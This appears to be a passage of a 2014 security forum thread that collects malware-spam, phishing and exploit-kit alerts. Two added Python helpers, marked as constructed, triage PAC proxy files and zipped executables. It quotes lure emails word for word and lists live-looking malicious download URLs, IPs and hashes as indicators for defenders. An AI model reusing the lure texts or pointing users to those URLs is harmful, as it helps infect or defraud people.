Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."

ddns .net / 8.23.224.108: https://www.virustot...08/information/
- http://quttera.com/d...report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___

Sony PlayStation Network taken down by attack
- http://www.reuters.c...N0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic... Sony is hoping its PlayStation network, with 52 million active users, can serve as a centerpiece of its plans to rebuild its business after years of losses in its flagship electronics operations..."

- http://www.reuters.c...N0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."

> http://support.xbox....box-live-status
 



Edited by AplusWebMaster, 25 August 2014 - 06:27 AM.


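The 'My Photos' write-up above describes a proxy auto-config (PAC) script that returns DIRECT for most traffic but routes selected bank hostnames through an attacker's proxy. The following added triage helper (not code from the original post or from myonlinesecurity) statically pulls the PROXY targets and host patterns out of a PAC file so a defender can spot an unapproved proxy; the sample PAC, its hostnames and the 203.0.113.x proxies are constructed.

```python
import re
from typing import Dict, List, Set

# A PAC file is JavaScript, but the parts that matter for triage are literal:
# "PROXY host:port" return values and the hostname matchers that select traffic.
_PROXY_RE = re.compile(r'PROXY\s+([A-Za-z0-9.\-]+:\d+)')
_MATCH_RE = re.compile(r'(?:shExpMatch|dnsDomainIs)\s*\(\s*\w+\s*,\s*"([^"]+)"')


def extract_pac_rules(pac_text: str) -> Dict[str, List[str]]:
    """Return the proxies a PAC script can hand out and the host patterns it
    keys on, in order of appearance with duplicates removed."""
    proxies = list(dict.fromkeys(_PROXY_RE.findall(pac_text)))
    patterns = list(dict.fromkeys(_MATCH_RE.findall(pac_text)))
    return {"proxies": proxies, "patterns": patterns}


def unexpected_proxies(pac_text: str, approved: Set[str]) -> List[str]:
    """Proxies the script returns that are not on the organisation's approved list."""
    return [p for p in extract_pac_rules(pac_text)["proxies"] if p not in approved]


def is_selective_redirect(pac_text: str) -> bool:
    """True when the script proxies only matched hosts and sends everything
    else DIRECT: the pattern the post describes for the banking interception."""
    rules = extract_pac_rules(pac_text)
    return bool(rules["proxies"]) and bool(rules["patterns"]) and "DIRECT" in pac_text


# Constructed sample PAC (hypothetical hostnames, documentation-range proxy IPs).
SAMPLE_PAC = '''
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.examplebank.co.uk")) return "PROXY 203.0.113.10:8080";
    if (dnsDomainIs(host, "otherbank.example")) return "PROXY 203.0.113.11:8080";
    return "DIRECT";
}
'''

if __name__ == "__main__":
    print(extract_pac_rules(SAMPLE_PAC))
    print("unapproved:", unexpected_proxies(SAMPLE_PAC, {"proxy.corp.example:3128"}))
    print("selective redirect:", is_selective_redirect(SAMPLE_PAC))
```

On a Windows host the PAC URL in use is the AutoConfigURL value of the user's Internet Settings; feed the file it points at to these functions.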

#1263 AplusWebMaster

Posted 25 August 2014 - 06:45 AM

FYI...

Fake Invoice SPAM - PDF Malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk. As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecur...ke-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
    WALSALL
    MAHON RD IND EST. PORTADOWN
    CO. ARMAGH BT62 3EH
    T:028 3833 5316
    F:028 3833 8453
    Please find attached Invoice No. 3036 – 8340637
    Best
    Branch Manager
    Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...


25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*  
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408955315/

** https://www.virustot...sis/1408955404/
___

Fake Fax SPAM - pdf malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretending to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
    A fax has arrived from remote ID ’866-905-0884′.
    ————————————————————
    Transmission Record
    Received from remote ID: ’866-905-0884′
    Inbound user ID derek, routing code 669164574
    Result: (0/352;0/0) Successful Send
    Page record: 1 – 2
    Elapsed time: 00:39 on channel 34 ...


25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55*. This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408971894/
___

Bank of America Activity Alert Spam
- http://threattrack.t...vity-alert-spam
Aug 25, 2014 - "Subjects Seen:
    Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
    Activity Alert
    A check exceeded your requested alert limit
    We’re letting you know a check written from your account went over the limit you set for this alert.
    For more details please check attached file


Screenshot: https://gs1.wac.edge...Tu861r6pupn.png

Malicious File Name and MD5:
    report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
    report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)


Tagged: Bank of America, Upatre
___

Facebook Work From Home SCAM
- http://www.hoax-slay...gram-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slay...gram-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___

Fake ADP SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
    Thank you for choosing ADP for your business solutions.
    Important: Please do not respond to this message. It is generated from an unattended mailbox.


25 August 2014: invoice_447589545.zip (10kb): Extracts to invoice_447589545.exe
Current Virus total detections: 2/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408992097/
___

BoA Merrill Lynch CashPro Spam
- http://threattrack.t...ch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
    Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
    You have received a secure message from Bank of America Merrill Lynch
    Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
    If you have concerns about the validity of this message, contact the sender directly.
    First time users - will need to register after opening the attachment.


Malicious URLs:
    161.58.101.183/handler/jxpiinstall.exe

Malicious File Name and MD5:
    securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
    jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)


Screenshot: https://gs1.wac.edge...RagN1r6pupn.png

Tagged: Bank of America, Merrill Lynch, tuscas

161.58.101.183: https://www.virustot...83/information/
 



Edited by AplusWebMaster, 25 August 2014 - 06:07 PM.


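Several of the items above (the fake invoice, fax and ADP runs) hinge on the same trick: a zipped executable carrying a document icon and a double extension such as .PDF.scr. The following added mail-gateway check (not code from the original post, the quoted blogs or any vendor) unpacks an attachment in memory, flags executable or disguised double extensions and confirms an MZ header; the sample archive and its dummy MZ bytes are constructed, the file names are taken from the posts.

```python
import io
import zipfile
from typing import Dict, List

# Extensions Windows runs on double-click; a ".pdf.scr" file is an executable
# regardless of the icon its resources carry.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf"}
# Document/image extensions that spoofed-icon files borrow to look harmless.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt"}


def inspect_entry(name: str, head: bytes) -> Dict[str, object]:
    """Classify one archive member by its extension chain and first bytes."""
    base = name.lower().rsplit("/", 1)[-1]
    exts = base.split(".")[1:]
    last = exts[-1] if exts else ""
    disguised = len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS
    return {
        "name": name,
        "executable_ext": last in EXECUTABLE_EXTS,
        "disguised_double_ext": disguised,
        "pe_header": head[:2] == b"MZ",   # DOS/PE stub, whatever the name says
    }


def inspect_attachment(zip_bytes: bytes) -> List[Dict[str, object]]:
    """Inspect every file inside a zip attachment without writing it to disk."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)       # only the magic bytes are needed
            findings.append(inspect_entry(info.filename, head))
    return findings


def should_block(zip_bytes: bytes) -> bool:
    """Block if any member is executable by name or by content."""
    return any(f["executable_ext"] or f["pe_header"] for f in inspect_attachment(zip_bytes))


def build_sample_zip() -> bytes:
    """Constructed stand-in for the attachments described above: two
    executables with dummy MZ headers and one genuine-looking PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Payment_Advice_Note_27.08.2014.PDF.scr", b"MZ" + b"\x00" * 62)
        zf.writestr("invoice_447589545.exe", b"MZ\x90\x00")
        zf.writestr("real_statement.pdf", b"%PDF-1.4\n")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for finding in inspect_attachment(sample):
        print(finding)
    print("block:", should_block(sample))
```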

#1264 AplusWebMaster

Posted 26 August 2014 - 04:14 AM

FYI...

Fake Vodafone SPAM
- http://blog.dynamoo....lware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is no body text as such, the header reads:
    From:     Vodafone MMS service [mms813562@ vodafone .co.uk]
    Date:     26 August 2014 12:00
    Subject:     IMG Id 813562-PictQbmR TYPE--MMS


The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1409051519/

** https://www.virustot...sis/1409052175/

192.254.186.106: https://www.virustot...06/information/
___

Phishers hook Facebook Users via SMS
- https://blog.malware...-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
    wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malware...2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malware.../dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malware.../08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura has published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remain relevant to this date..."
* https://blog.malware...efend-yourself/

193.107.17.68: https://www.virustot...68/information/
___

Vacation SCAMS ...
- https://blog.malware...-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justthefl...his-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by  pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/...ingle-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/...p-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___

SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malware...ck-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustot...om/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
https://www.virustot...sis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustot...sis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether it is part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustot...sis/1408996125/

dnsdynamic .com - 84.45.76.100: https://www.virustot...00/information/
 



Edited by AplusWebMaster, 26 August 2014 - 01:44 PM.



#1265 AplusWebMaster

Posted 27 August 2014 - 05:43 AM

FYI...

Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo....lware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
    From:     Madikwe, Gladness [GMadikwe@mcm.co.uk]
    Date:     27 August 2014 10:43
    Subject:     Tax Invoice for Delivery Note 11155 dated 22.08.14
    Hello,
    Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
    Thank you
    Regards
    Gladness B Madikwe
    Sales & Marketing Clerk
    Morupule Coal Mine ...


Screenshot: http://1.bp.blogspot...00/moropule.png

Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustot...sis/1409133512/
___

Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.c...-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most commonly used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the time only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
    Java .com
    Deviantart .com
    TMZ .com
    Photobucket .com
    IBTimes .com
    eBay .ie
    Kapaza .be
    TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
    198.27.88.157: https://www.virustot...57/information/
    94.23.252.38: https://www.virustot...38/information/
    178.32.21.248: https://www.virustot...48/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___

"Customer Statements" - malware SPAM
- http://blog.dynamoo....lware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
    From:     Accounts [hiqfrancistown910@ gmail .com]
    Date:     27 August 2014 09:51
    Subject:     Customer Statements
    Good morning,attached is your statement.
    My regards.
    W ELIAS


Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustot...sis/1409135030/
___

Royal Bank of Canada Payment Spam
- http://threattrack.t...da-payment-spam
Aug 27, 2014 - "Subjects Seen:
    The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
    The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
    The transfer is now complete.
    Message recipient: The rating was not provided.
    See details in the attached report.
    Thank you for using the Service INTERAC Bank RBC Royal Bank.


Malicious File Name and MD5:
    INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
    INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D)


Screenshot: https://gs1.wac.edge...OUqn1r6pupn.png

Tagged: RBC, Upatre
___

AT&T DocuSign Spam
- http://threattrack.t...t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
    Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
    Hello,
    AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.


Malicious URLs:
    79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
    Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
    Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)


Screenshot: https://gs1.wac.edge...fIWp1r6pupn.png

79.172.51.73: https://www.virustot...73/information/

Tagged: ATT, DocuSign, Upatre

- http://myonlinesecur...ke-pdf-malware/
27 Aug 2014
___

ADP Past Due Invoice Spam
- http://threattrack.t...ue-invoice-spam
Aug 27, 2014 - "Subjects Seen:
    ADP Past Due Invoice
Typical e-mail details:
    Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
    If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
    Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
    Review your ADP past due invoice here...


Malicious URLs:
    81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
    invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
    invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)


Screenshot: https://gs1.wac.edge...SD3h1r6pupn.png

81.80.82.27: https://www.virustot...27/information/

Tagged: ADP, Upatre
___

Fake Payment Advice SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Disclaimer:
    This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
    AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
    Cell 270 547-9194


27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb): Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55*. This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409154303/
 



Edited by AplusWebMaster, 27 August 2014 - 03:39 PM.



#1266 AplusWebMaster

Posted 28 August 2014 - 07:05 PM

FYI...

The ‘Unknown’ Exploit Kit ...
- https://blog.malware...wn-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malware...rlight_only.png
Flash only:
> https://blog.malware.../Flash_only.png
Silverlight and Flash:
> https://blog.malware...t_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)
 





#1267 AplusWebMaster

Posted 29 August 2014 - 05:31 AM

FYI...

Fake 'new photo' SPAM - malware
- http://myonlinesecur...-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:

    my new photo  ..
    if you like my photo to send me u photo


29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustot...sis/1409297373/
___

Netflix PHISH ...
- https://blog.malware...u-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malware...hish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malware.../08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."

176.74.28.254: https://www.virustot...54/information/

netflix-ssl .net / 92.222.121.100: https://www.virustot...00/information/
8.31.2014 9:02AM EDT
___

Internet Disconnection SCAM calls
- http://www.hoax-slay...cam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___

Fake Refund email targets UK taxpayers
- https://blog.malware...s-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malware...08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malware...08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HMRC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov....y/reporting.htm
___

New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmic...etail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The -install option installs the malware with service name <AV_Company> Framework Management Instrumentation, and the -uninstall option deletes that service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses the CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store Target in December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks.
IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicr...em-breaches.pdf
___

Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquir...s-windows-store
